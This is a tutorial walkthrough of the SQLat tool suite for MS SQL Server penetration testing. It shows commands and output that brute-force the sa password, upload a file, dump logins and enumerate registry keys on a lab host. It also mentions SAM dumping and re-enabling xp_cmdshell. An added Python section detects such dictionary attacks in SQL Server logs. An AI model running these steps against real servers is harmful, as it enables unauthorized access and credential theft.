SQL Auditing Tools (SQLat)

SQLat is a nice suite of tools which come in handy when trying to
carry out a vulnerability assessment/penetration test against a MS SQL
Server.
SQLat encompasses the following tools:
- sqlanlz - Enumerates information about databases, users, extended
stored procedures etc. and outputs it as an HTML report.
- sqldict - Carries out a dictionary-based attack on the user(s)
specified.
- sqldirtree - Outputs an ASCII directory tree of the base directory
specified.
- sqldumplogins - Dumps all user accounts from the MS SQL Server.
- sqlquery - Interactive query tool.
- sqlregenumkey - Enumerates registry keys.
- sqlreggetvalue - Enumerates the values for a specific registry key.
- sqlsamdump - Attempts to dump the SAM from a SQL Server using
pwdump2.
- sqlupload - Attempts to upload files to a MS SQL Server.
Note: the tools temporarily restore xp_cmdshell if it has been removed
but its DLL is still left on the system, and you do require credentials
for a number of the above to work correctly. SQLat is based on the
FreeTDS library and as of version 1.0.6 supports NTLM integrated login.
It does not do named pipes yet.

Installation:

SQLat has a number of prerequisites. FreeTDS needs to be installed
first, with the usual procedure for a tar.gz file:
./configure
make
make install
pwdump2 needs to be unzipped to an appropriate directory.
To install SQLat use the following commands (the --with-tdsver=7.0
parameter, or at least that parameter, is required):
./configure --with-tdsver=7.0
make
make install
It is available from here.
Execution and expected output:

[root@hacker bin]# ./sqldict
SQLDict v1.1.0 by patrik@cqure.net
----------------------------------
usage: ./sqldict [options]
  -i* <ip|ipfile> to probe
  -t port (default 1433)
  -u* <userfile>
  -p* <dicfile>
  -r <reportfile>
  -v verbose

[root@hacker bin]# ./sqldict -i 192.168.1.175 -u user.txt -p password.txt
IP: 192.168.1.175 User: sa Pass: password

Obviously we got the easy password for sa, which is "password".
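From the defender's side, a dictionary run like the one above shows up in the SQL Server ERRORLOG as a burst of "Login failed for user" entries (error 18456) from one client, followed by a "Login succeeded" entry once the password is found. The detector below is an added example, not part of SQLat; the log lines it parses are constructed for illustration in the format SQL Server writes when login auditing is enabled, and the threshold and window are assumptions.

```python
# Added example: flag sqldict-style dictionary attacks in SQL Server ERRORLOG
# lines (burst of failed logins per client+login, then a success = cracked).
# Sample log lines are constructed; threshold/window values are assumptions.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*?"
    r"\[CLIENT: (?P<client>[\d.]+)\]")

def parse_line(line):
    """Return (timestamp, result, user, client) or None for other lines."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
    return ts, m["result"], m["user"], m["client"]

def detect_dictionary_attacks(lines, threshold=5, window=timedelta(minutes=1)):
    """Return (client, user, failures_in_window, cracked) alerts.
    >= threshold failures from one client for one login inside the window
    raises a burst alert; a success while the burst is still in the window
    raises a second alert with cracked=True."""
    recent = defaultdict(deque)     # (client, user) -> failure timestamps
    burst_alerted, alerts = set(), []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:          # e.g. the "Error: 18456, Severity" line
            continue
        ts, result, user, client = parsed
        key, q = (client, user), recent[(client, user)]
        while q and ts - q[0] > window:   # slide the window forward
            q.popleft()
        if result == "failed":
            q.append(ts)
            if len(q) >= threshold and key not in burst_alerted:
                burst_alerted.add(key)
                alerts.append((client, user, len(q), False))
        elif len(q) >= threshold:   # success right after a burst of failures
            alerts.append((client, user, len(q), True))
    return alerts

def _entry(sec, result, user, client):  # builds one constructed ERRORLOG line
    reason = ("Reason: Password did not match that for the login provided. "
              if result == "failed" else "Connection made using SQL Server authentication. ")
    return f"2024-01-15 10:00:{sec:02d}.00 Logon       Login {result} for user '{user}'. {reason}[CLIENT: {client}]"

SAMPLE_LOG = (["2024-01-15 10:00:01.00 Logon       Error: 18456, Severity: 14, State: 8."]
              + [_entry(s, "failed", "sa", "192.168.1.175") for s in range(1, 7)]
              + [_entry(7, "succeeded", "sa", "192.168.1.175"), _entry(8, "failed", "app", "10.0.0.9")])

if __name__ == "__main__":
    for alert in detect_dictionary_attacks(SAMPLE_LOG):
        print(alert)
```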
[root@hacker bin]# ./sqlquery
SQLExec v1.1.0 by <patrik@cqure.net>
------------------------------------
./sqlquery [options]
  -i* <ipaddress>
  -t port (default 1433)
  -q <query> (if ommited execute interactive mode)
  -u username
  -p password

[root@hacker bin]# ./sqlquery -i 192.168.1.175 -u sa -p password -q "select @@version"
SQLExec v1.1.0 by <patrik@cqure.net>
------------------------------------------
Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 27 1998 22:20:07
Copyright (c) 1988-1998 Microsoft Corporation
Standard Edition on Windows NT 4.0 (Build 1381: Service Pack 6)
This passes an SQL query to determine the version of the database; in
this example we are using the sa credentials broken earlier.
[root@hacker bin]# ./sqlupload
SQLUPLOAD v1.1.0 by patrik@cqure.net
------------------------------------
usage: ./sqlupload [options]
  -i* <ipaddress> to probe
  -t port (default 1433)
  -f* <filename> to upload
  -u username
  -p password
  -T path to tempdir if not autodetected
  -h this
  -v verbose

[root@hacker bin]# ./sqlupload -i 192.168.1.175 -u sa -p password -f user.txt -v
SQLUpload by Patrik Karlsson <patrik@cqure.net>
-- Logging in to 192.168.1.175 --
-- Searching for temp path --
Your file will be in c:\temp
-- Uploading user.txt --

An attempt to upload a file with sa credentials, succeeding.
[root@hacker bin]# ./sqldumplogins
SQLDumpLogins v1.1.0 by <patrik@cqure.net>
------------------------------------------
./sqldumplogins [options]
  -i* <ipaddress>
  -t port (default 1433)
  -u username
  -p password

[root@hacker bin]# ./sqldumplogins -i 192.168.1.175 -u sa -p password
SQLDumpLogins v1.1.0 by <patrik@cqure.net>
------------------------------------------
Administrator
sa

This enumerates all logins on the remote machine utilising the
privileges gained previously.
[root@hacker bin]# ./sqlregenumkey
./sqlregenumkey: option requires an argument -- k
SQLRegEnum v1.1.0 by <patrik@cqure.net>
---------------------------------------
./sqlregenumkey [options]
  -i* <ipaddress>
  -t port (default 1433)
  -k <key> (default HKLM\SW\MS\Win\CurrVer\Run)
  -u <username>
  -p <password>

[root@hacker bin]# ./sqlregenumkey -i 192.168.1.175 -u sa -p password -k
SQLRegEnum v1.1.0 by <patrik@cqure.net>
------------------------------------------
SystemTray=SysTray.Exe
BrowserWebCheck=loadwc.exe
SchedulingAgent=mstinit.exe /logon
VMware Tools=C:\Program Files\VMware\VMware Tools\VMwareTray.exe
VMware User Process=C:\Program Files\VMware\VMware Tools\VMwareUser.exe

This enumerates the programs run at system boot from the Run key; the
VMware entries show that in this case we are attacking a virtual machine.